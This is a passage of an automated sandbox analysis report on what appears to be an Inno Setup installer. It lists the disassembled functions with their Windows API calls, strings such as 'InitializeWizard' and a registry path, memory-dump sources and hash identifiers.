                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: Inno Setup: Setup Version$r_G
                                                                  • API String ID: 3702945584-2380526977
                                                                  • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                  • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                                  • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                  • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                                  Function 00475034 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                  • String ID: CreateFile
                                                                  • API String ID: 2528220319-823142352
                                                                  • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                  • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                                  • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                  • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                                  Function 00456ED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                  • API String ID: 2906209438-2320870614
                                                                  • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                  • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                                  • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                  • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                                  Function 0046CC10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                  • API String ID: 2492108670-2683653824
                                                                  • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                  • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                                  • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                  • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                                  Function 00448524 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 2574300362-0
                                                                  • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                  • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                                  • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                  • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                                  Function 00481240 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Append$System
                                                                  • String ID:
                                                                  • API String ID: 1489644407-0
                                                                  • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                  • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                                  • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                  • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                                  Function 004524E4 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                                  • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                                  • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: D41500D41520D41540
                                                                  • String ID:
                                                                  • API String ID: 2153611984-0
                                                                  • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                  • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                                  • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                  • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                                  Function 0044B384 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                                  • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A480A570ObjectSelect
                                                                  • String ID:
                                                                  • API String ID: 1230475511-0
                                                                  • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                  • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                                  • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                  • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                                  Function 0044B0B8 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 65125430-0
                                                                  • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                  • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                                  • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                  • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                                  Function 004243F4 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                                  • TranslateMessage.USER32(?), ref: 00424487
                                                                  • DispatchMessageA.USER32(?), ref: 00424491
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 4217535847-0
                                                                  • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                  • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                                  • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                  • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                                  Function 0041663C Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                                  • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Prop$Window
                                                                  • String ID:
                                                                  • API String ID: 3363284559-0
                                                                  • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                  • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                                  • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                  • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                                  Function 0041EE4C Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                                  • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                                  • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableEnabledVisible
                                                                  • String ID:
                                                                  • API String ID: 3234591441-0
                                                                  • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                  • Instruction ID: 168d1bb9c0e6e8839a01a9d99d3d7c452caa6e9a1b9b90f31caf5ae3eef8e520
                                                                  • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                  • Instruction Fuzzy Hash: 75E06D75100300AAE701AB2BDCC1B5B7ADCAB54350F02843FA9489B292D63ADC408B3C
                                                                  Function 00469D44 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?), ref: 00469E55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ActiveWindow
                                                                  • String ID: PrepareToInstall
                                                                  • API String ID: 2558294473-1101760603
                                                                  • Opcode ID: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                                  • Instruction ID: e2c6ec18e62d86bdb0c44b4d883dda39cec9e825136043f452d3b1ffdd24169b
                                                                  • Opcode Fuzzy Hash: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                                  • Instruction Fuzzy Hash: 32A12C34A00105DFCB00EF9AD986EDEB7F5EF48304F5580B6E404AB362D778AE459B99
                                                                  Function 0046C2DC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /:*?"<>|
                                                                  • API String ID: 0-4078764451
                                                                  • Opcode ID: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                                  • Instruction ID: b0c2865fc5a4d1d7a494ca3edaa4dc5a45f3ff44e2e280cd3bc35834766e41d0
                                                                  • Opcode Fuzzy Hash: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                                  • Instruction Fuzzy Hash: 1671D770B002546AEB20EB66DCC2BEE77A19F44704F50C067F580AB391E779AD85875F
                                                                  Function 00481B8C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?), ref: 00481C3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ActiveWindow
                                                                  • String ID: InitializeWizard
                                                                  • API String ID: 2558294473-2356795471
                                                                  • Opcode ID: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                                  • Instruction ID: 5241d356f86f5b5e3f0808c496da9b9c49bd8f9ac143394a12901a1e43732a0a
                                                                  • Opcode Fuzzy Hash: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                                  • Instruction Fuzzy Hash: 411182342452009FD700EBA9ED96B693BE8EB65318F10043BE5018B2A1DA396C01CB2D
                                                                  Function 0047BDA4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                  • API String ID: 47109696-1019749484
                                                                  • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                  • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                                  • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                  • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                                  Function 0046ECD4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
